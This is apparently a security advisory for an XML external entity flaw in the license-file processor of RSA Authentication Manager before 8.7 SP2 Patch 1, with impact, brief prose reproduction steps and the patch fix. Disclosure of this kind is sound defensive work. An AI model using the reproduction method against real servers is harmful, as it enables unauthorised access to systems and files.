RSA Authentication Manager XML External Entity Vulnerability Allowing Arbitrary File Upload

A vulnerability allowing XML External Entity (XXE) attacks has been identified in RSA Authentication Manager versions prior to 8.7 SP2 Patch 1. This issue arises in the license file processor, where an attacker can upload a license file containing an XML external entity. While typical data exfiltration associated with XXE attacks is not possible, the vulnerability allows arbitrary files to be downloaded by the RSA Authentication Manager server, potentially leading to unauthorized access to sensitive information or files.

Impact

Exploitation of this vulnerability could result in unauthorized file uploads to the server, with the potential for those files to be accessed or executed, depending on their nature and the server's configuration.

Reproduction

To reproduce this vulnerability, upload a license file that includes an XML external entity pointing to a file on an external server. The RSA Authentication Manager server will send an out-of-band HTTP request to the specified location, indicating that the file has been accessed.

Remediation

Users can update to RSA Authentication Manager 8.7 SP2 Patch 1 to address this vulnerability.